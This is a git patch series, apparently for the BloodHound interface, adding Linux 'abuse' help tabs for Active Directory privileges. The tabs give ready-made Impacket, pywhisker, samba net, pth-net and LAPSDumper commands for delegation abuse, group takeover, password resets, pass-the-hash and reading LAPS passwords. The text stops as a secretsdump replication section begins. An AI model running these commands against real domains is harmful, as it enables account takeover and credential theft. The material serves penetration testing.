From f4b5becf897a5d204e4fa2f1adf5bed9b1873d97 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 13:57:51 +0100
Subject: [PATCH 01/32] AddAllowedToAct Linux abuse

---
 .../AddAllowedToAct/AddAllowedToAct.jsx       | 14 ++++---
 .../HelpTexts/AddAllowedToAct/LinuxAbuse.jsx  | 42 +++++++++++++++++++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |  4 +-
 3 files changed, 53 insertions(+), 7 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/AddAllowedToAct/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/AddAllowedToAct/{Abuse.jsx => WindowsAbuse.jsx} (98%)

diff --git a/src/components/Modals/HelpTexts/AddAllowedToAct/AddAllowedToAct.jsx b/src/components/Modals/HelpTexts/AddAllowedToAct/AddAllowedToAct.jsx
index 2bfc53f00..ad1157805 100644
--- a/src/components/Modals/HelpTexts/AddAllowedToAct/AddAllowedToAct.jsx
+++ b/src/components/Modals/HelpTexts/AddAllowedToAct/AddAllowedToAct.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const AddAllowedToAct = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/AddAllowedToAct/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AddAllowedToAct/LinuxAbuse.jsx
new file mode 100644
index 000000000..f4469cda1
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AddAllowedToAct/LinuxAbuse.jsx
@@ -0,0 +1,42 @@
+import React from 'react';
+
+const LinuxAbuse = () => {
+    return (
+        <>
+            First, if an attacker does not control an account with an
+            SPN set, a new attacker-controlled computer account can be
+            added with Impacket's addcomputer.py example script:
+            <pre>
+                <code>
+                    {
+                        "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                    }
+                </code>
+            </pre>
+            We now need to configure the target object so that the attacker-controlled
+            computer can delegate to it. Impacket's rbcd.py script can be used for that
+            purpose:
+            <pre>
+                <code>
+                    {
+                        "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                    }
+                </code>
+            </pre>
+            And finally we can get a service ticket for the service name (sname) we
+            want to "pretend" to be "admin" for. Impacket's getST.py example script
+            can be used for that purpose.
+            <pre>
+                <code>
+                    {
+                        "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                    }
+                </code>
+            </pre>
+            This ticket can then be used with Pass-the-Ticket, and could grant access
+            to the file system of the TARGETCOMPUTER.
+        </>
+    );
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/AddAllowedToAct/Abuse.jsx b/src/components/Modals/HelpTexts/AddAllowedToAct/WindowsAbuse.jsx
similarity index 98%
rename from src/components/Modals/HelpTexts/AddAllowedToAct/Abuse.jsx
rename to src/components/Modals/HelpTexts/AddAllowedToAct/WindowsAbuse.jsx
index 457a02870..35951ce45 100644
--- a/src/components/Modals/HelpTexts/AddAllowedToAct/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/AddAllowedToAct/WindowsAbuse.jsx
@@ -1,6 +1,6 @@
 import React from 'react';
 
-const Abuse = () => {
+const WindowsAbuse = () => {
     return (
         <>
             Abusing this primitive is currently only possible through the Rubeus
@@ -62,4 +62,4 @@ const Abuse = () => {
     );
 };
 
-export default Abuse;
+export default WindowsAbuse;

From b88e29c1aad9b5fa6650ce1cb28a20955f425dfb Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 14:06:51 +0100
Subject: [PATCH 02/32] Adding references for AddAllowedToAct

---
 .../Modals/HelpTexts/AddAllowedToAct/References.jsx       | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/src/components/Modals/HelpTexts/AddAllowedToAct/References.jsx b/src/components/Modals/HelpTexts/AddAllowedToAct/References.jsx
index fd36e6918..e839d9ec7 100644
--- a/src/components/Modals/HelpTexts/AddAllowedToAct/References.jsx
+++ b/src/components/Modals/HelpTexts/AddAllowedToAct/References.jsx
@@ -26,6 +26,14 @@ const References = () => {
             <a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
                 https://github.com/Kevin-Robertson/Powermad#new-machineaccount
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota'>
+                https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota
+            </a>
         </>
     );
 };

From 8f1584303be30083218695f9e263526da3afc265 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 14:14:14 +0100
Subject: [PATCH 03/32] AddKeyCredentialLink Linux abuse

---
 .../AddKeyCredentialLink.jsx                  | 14 +++++----
 .../AddKeyCredentialLink/LinuxAbuse.jsx       | 29 +++++++++++++++++++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |  8 ++---
 3 files changed, 42 insertions(+), 9 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/AddKeyCredentialLink/{Abuse.jsx => WindowsAbuse.jsx} (81%)

diff --git a/src/components/Modals/HelpTexts/AddKeyCredentialLink/AddKeyCredentialLink.jsx b/src/components/Modals/HelpTexts/AddKeyCredentialLink/AddKeyCredentialLink.jsx
index 459921777..837344054 100644
--- a/src/components/Modals/HelpTexts/AddKeyCredentialLink/AddKeyCredentialLink.jsx
+++ b/src/components/Modals/HelpTexts/AddKeyCredentialLink/AddKeyCredentialLink.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const AddKeyCredentialLink = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx
new file mode 100644
index 000000000..d4ce8d1ea
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx
@@ -0,0 +1,29 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>To abuse this privilege, use
+                <a href='https://github.com/ShutdownRepo/pywhisker'>
+                    pyWhisker
+                </a>
+            .</p>
+
+            <pre>
+                <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+            </pre>
+
+            <p>
+                For other optional parameters, view the pyWhisker documentation.
+            </p>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/AddKeyCredentialLink/Abuse.jsx b/src/components/Modals/HelpTexts/AddKeyCredentialLink/WindowsAbuse.jsx
similarity index 81%
rename from src/components/Modals/HelpTexts/AddKeyCredentialLink/Abuse.jsx
rename to src/components/Modals/HelpTexts/AddKeyCredentialLink/WindowsAbuse.jsx
index 4774cf35b..6e18f5337 100644
--- a/src/components/Modals/HelpTexts/AddKeyCredentialLink/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/AddKeyCredentialLink/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>To abuse this privilege, use Whisker. </p>
@@ -18,15 +18,15 @@ const Abuse = ({ sourceName, sourceType }) => {
             </pre>
 
             <p>
-                For other optional parameters, view the Whisper documentation.
+                For other optional parameters, view the Whisker documentation.
             </p>
         </>
     );
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

From f99e4c0cceb2b460723ece767cca8163aa003119 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 14:25:34 +0100
Subject: [PATCH 04/32] AddMember Linux abuse

---
 .../Modals/HelpTexts/AddMember/AddMember.jsx  | 14 +++--
 .../Modals/HelpTexts/AddMember/LinuxAbuse.jsx | 55 +++++++++++++++++++
 .../Modals/HelpTexts/AddMember/References.jsx |  4 ++
 .../AddMember/{Abuse.jsx => WindowsAbuse.jsx} |  6 +-
 4 files changed, 71 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/AddMember/{Abuse.jsx => WindowsAbuse.jsx} (96%)

diff --git a/src/components/Modals/HelpTexts/AddMember/AddMember.jsx b/src/components/Modals/HelpTexts/AddMember/AddMember.jsx
index 8ee328de4..59a751a63 100644
--- a/src/components/Modals/HelpTexts/AddMember/AddMember.jsx
+++ b/src/components/Modals/HelpTexts/AddMember/AddMember.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const AddMember = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
new file mode 100644
index 000000000..0b8348dee
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
@@ -0,0 +1,55 @@
+import React from 'react';
+import PropTypes from "prop-types";
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>
+                Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                or prompted interactively if omitted from the command line:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Pass-the-hash can also be done here with
+                <a href='https://github.com/byt3bl33d3r/pth-toolkit'>
+                    pth-toolkit's net tool
+                </a>. If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Finally, verify that the user was successfully added to the group:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes= {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string
+}
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/AddMember/References.jsx b/src/components/Modals/HelpTexts/AddMember/References.jsx
index 49fd24921..1134cb825 100644
--- a/src/components/Modals/HelpTexts/AddMember/References.jsx
+++ b/src/components/Modals/HelpTexts/AddMember/References.jsx
@@ -14,6 +14,10 @@ const References = () => {
             <a href='https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728'>
                 https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/addmember'>
+                https://www.thehacker.recipes/ad/movement/dacl/addmember
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/AddMember/Abuse.jsx b/src/components/Modals/HelpTexts/AddMember/WindowsAbuse.jsx
similarity index 96%
rename from src/components/Modals/HelpTexts/AddMember/Abuse.jsx
rename to src/components/Modals/HelpTexts/AddMember/WindowsAbuse.jsx
index d67657fc8..6c03bcc87 100644
--- a/src/components/Modals/HelpTexts/AddMember/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/AddMember/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from "prop-types";
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>
@@ -66,9 +66,9 @@ const Abuse = ({ sourceName, sourceType }) => {
     );
 };
 
-Abuse.propTypes= {
+WindowsAbuse.propTypes= {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string
 }
 
-export default Abuse;
+export default WindowsAbuse;

From b0568533887b4cecdd45e178b31ab7aa5618e60a Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 14:30:04 +0100
Subject: [PATCH 05/32] Fixing missing space with links

---
 .../Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx    | 6 +-----
 src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx    | 6 ++----
 2 files changed, 3 insertions(+), 9 deletions(-)

diff --git a/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx
index d4ce8d1ea..a1a3305bc 100644
--- a/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx
@@ -4,11 +4,7 @@ import PropTypes from 'prop-types';
 const LinuxAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
-            <p>To abuse this privilege, use
-                <a href='https://github.com/ShutdownRepo/pywhisker'>
-                    pyWhisker
-                </a>
-            .</p>
+            <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
 
             <pre>
                 <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
diff --git a/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
index 0b8348dee..cb69fd29f 100644
--- a/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
@@ -18,10 +18,8 @@ const LinuxAbuse = ({ sourceName, sourceType }) => {
             </pre>
 
             <p>
-                Pass-the-hash can also be done here with
-                <a href='https://github.com/byt3bl33d3r/pth-toolkit'>
-                    pth-toolkit's net tool
-                </a>. If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
             </p>
 
             <pre>

From b73c2b31bcf6b86eb3b7069571c4566da87f191a Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 14:36:18 +0100
Subject: [PATCH 06/32] AddSelf Linux abuse

---
 .../Modals/HelpTexts/AddSelf/AddSelf.jsx      | 14 +++--
 .../Modals/HelpTexts/AddSelf/LinuxAbuse.jsx   | 53 +++++++++++++++++++
 .../Modals/HelpTexts/AddSelf/References.jsx   |  8 +++
 .../AddSelf/{Abuse.jsx => WindowsAbuse.jsx}   |  6 +--
 4 files changed, 73 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/AddSelf/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/AddSelf/{Abuse.jsx => WindowsAbuse.jsx} (96%)

diff --git a/src/components/Modals/HelpTexts/AddSelf/AddSelf.jsx b/src/components/Modals/HelpTexts/AddSelf/AddSelf.jsx
index 7b6dbd52c..0c6c3c882 100644
--- a/src/components/Modals/HelpTexts/AddSelf/AddSelf.jsx
+++ b/src/components/Modals/HelpTexts/AddSelf/AddSelf.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const AddSelf = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/AddSelf/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AddSelf/LinuxAbuse.jsx
new file mode 100644
index 000000000..cb69fd29f
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AddSelf/LinuxAbuse.jsx
@@ -0,0 +1,53 @@
+import React from 'react';
+import PropTypes from "prop-types";
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>
+                Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                or prompted interactively if omitted from the command line:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Finally, verify that the user was successfully added to the group:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes= {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string
+}
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/AddSelf/References.jsx b/src/components/Modals/HelpTexts/AddSelf/References.jsx
index 49fd24921..000345dd8 100644
--- a/src/components/Modals/HelpTexts/AddSelf/References.jsx
+++ b/src/components/Modals/HelpTexts/AddSelf/References.jsx
@@ -14,6 +14,14 @@ const References = () => {
             <a href='https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728'>
                 https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/addmember'>
+                https://www.thehacker.recipes/ad/movement/dacl/addmember
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl#bloodhound-edges'>
+                https://www.thehacker.recipes/ad/movement/dacl#bloodhound-edges
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/AddSelf/Abuse.jsx b/src/components/Modals/HelpTexts/AddSelf/WindowsAbuse.jsx
similarity index 96%
rename from src/components/Modals/HelpTexts/AddSelf/Abuse.jsx
rename to src/components/Modals/HelpTexts/AddSelf/WindowsAbuse.jsx
index 5256d5ff0..0321e81b6 100644
--- a/src/components/Modals/HelpTexts/AddSelf/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/AddSelf/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>
@@ -66,9 +66,9 @@ const Abuse = ({ sourceName, sourceType }) => {
     );
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

From a45e6d717d5b80ff756b9f945a5bbefdb1cfcf04 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 14:40:46 +0100
Subject: [PATCH 07/32] Adding other UNIX-like tools to AdminTo

---
 src/components/Modals/HelpTexts/AdminTo/Abuse.jsx | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/src/components/Modals/HelpTexts/AdminTo/Abuse.jsx b/src/components/Modals/HelpTexts/AdminTo/Abuse.jsx
index 09bb60d4d..69fa82aca 100644
--- a/src/components/Modals/HelpTexts/AdminTo/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/AdminTo/Abuse.jsx
@@ -12,7 +12,10 @@ const Abuse = () => {
                 Invoke-SMBExec. With Metasploit, consider the modules
                 "exploit/windows/smb/psexec",
                 "exploit/windows/winrm/winrm_script_exec", and
-                "exploit/windows/local/ps_wmi_exec". Additionally, there are
+                "exploit/windows/local/ps_wmi_exec".
+                With Impacket, consider the example scripts
+                psexec/wmiexec/smbexec/atexec/dcomexec. There are other alternatives
+                like evil-winrm and crackmapexec. Additionally, there are
                 several manual methods for remotely executing code on the
                 machine, including via RDP, with the service control binary and
                 interaction with the remote machine's service control manager,

From 6ea097b8e38ee210927a770f88c50eba0068813c Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 16:32:07 +0100
Subject: [PATCH 08/32] AllExtendedRights Linux abuse

---
 .../AllExtendedRights/AllExtendedRights.jsx   |  20 ++-
 .../AllExtendedRights/LinuxAbuse.jsx          | 133 ++++++++++++++++++
 .../AllExtendedRights/References.jsx          |  16 +++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |   6 +-
 4 files changed, 167 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/AllExtendedRights/{Abuse.jsx => WindowsAbuse.jsx} (97%)

diff --git a/src/components/Modals/HelpTexts/AllExtendedRights/AllExtendedRights.jsx b/src/components/Modals/HelpTexts/AllExtendedRights/AllExtendedRights.jsx
index f7c5189da..415ae1fe3 100644
--- a/src/components/Modals/HelpTexts/AllExtendedRights/AllExtendedRights.jsx
+++ b/src/components/Modals/HelpTexts/AllExtendedRights/AllExtendedRights.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -23,8 +24,8 @@ const AllExtendedRights = ({
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse
                     sourceName={sourceName}
                     sourceType={sourceType}
                     targetName={targetName}
@@ -32,10 +33,19 @@ const AllExtendedRights = ({
                     haslaps={haslaps}
                 />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse
+                    sourceName={sourceName}
+                    sourceType={sourceType}
+                    targetName={targetName}
+                    targetType={targetType}
+                    haslaps={haslaps}
+                />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
new file mode 100644
index 000000000..18465a52c
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
@@ -0,0 +1,133 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps }) => {
+    switch (targetType) {
+        case 'User':
+            return (
+                <>
+                    <p>
+                        The AllExtendedRights privilege grants {sourceName} the
+                        ability to change the password of the user {targetName}{' '}
+                        without knowing their current password. This is
+                        equivalent to the "ForceChangePassword" edge in
+                        BloodHound.
+                    </p>
+
+                    <p>
+                        Use samba's net tool to change the user's password. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line. The new password will be prompted
+                        if omitted from the command line.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'Computer':
+            if (haslaps)
+                return (
+                    <>
+                        <p>
+                            The AllExtendedRights privilege grants {sourceName} the
+                            ability to obtain the RID 500 administrator password of{' '}
+                            {targetName}. {sourceName} can do so by listing a
+                            computer object's AD properties with PowerView using
+                            Get-DomainComputer {targetName}. The value of the
+                            ms-mcs-AdmPwd property will contain password of the
+                            administrative local account on {targetName}.
+                        </p>
+
+                        <p>
+                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                             to retrieve LAPS passwords:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            </code>
+                        </pre>
+                    </>
+                );
+            else
+                return (
+                    <p>
+                        This ACE is not exploitable under current conditions.
+                        Please report this bug to the BloodHound developers
+                    </p>
+                );
+        case 'Domain':
+            return (
+                <>
+                    <p>
+                        The AllExtendedRights privilege grants {sourceName} both the
+                        DS-Replication-Get-Changes and
+                        DS-Replication-Get-Changes-All privileges, which combined
+                        allow a principal to replicate objects from the domain{' '}
+                        {targetName}.
+                    </p>
+
+                    <p>
+                        This can be abused using Impacket's secretsdump.py example script:
+                    </p>
+
+                    <pre>
+                            <code>
+                                {
